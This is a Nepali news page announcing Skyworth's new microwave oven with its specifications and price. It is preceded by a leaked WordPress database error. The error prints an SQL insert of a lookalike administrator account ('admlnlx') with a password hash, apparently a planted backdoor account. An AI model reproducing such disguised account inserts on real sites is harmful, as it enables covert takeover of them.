WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByVQhgFVEM3u9GeJWtOCKzeWfqrAQV/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-27 21:31:48', '', 'admlnlx', 'admlnlx')

स्काईवर्थको नयाँ “माइक्रोवेभ ओभन” बजारमा – Gaule Khabar

स्काईवर्थको नयाँ “माइक्रोवेभ ओभन” बजारमा

स्काईवर्थको नयाँ “माइक्रोवेभ ओभन” बजारमा

काठमाडौं, मंसिर १७–

नेपालको एक अग्रणी कम्पनी तथा नेपालका लागि स्काईवर्थ इलेक्ट्रोनिक्सको आधिकारिक विक्रेता स्मार्ट एप्लाएनसेस्ले आफ्नो नयाँ माइक्रोवेभ ओभनलाई नेपाली बजारमा ल्याएको छ ।

कम्पनीको यो लेटेस्ट प्रस्तुतीको क्षमता ३० लिटर रहेको छ भने यसमा फुल ग्रील कन्भेक्सन जस्ता फिचर्स् र आकर्षक मिरर ग्लास फिनिस पनि रहेको छ । ९०० वाटको क्षमता भएको उक्त एप्लाएन्स्को प्रारम्भिक मूल्य कम्पनीले १७ हजार ५ सय रुपैयाँ तोकेको छ । साथै, ग्राहकहरुका लागि थप सन्तुष्टी अनि खुशीको लागि उक्त माइक्रोवेभ ओभनको म्याग्नेट्रनमा ५ वर्षको वारेन्टी पनि रहेको छ ।

यसरी उक्त नयाँ प्रोडक्टले ग्राहकहरुलाई उपयोगिता देखि स्टाइल अनि विश्वस्नीयता सबै पस्केको कम्पनीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका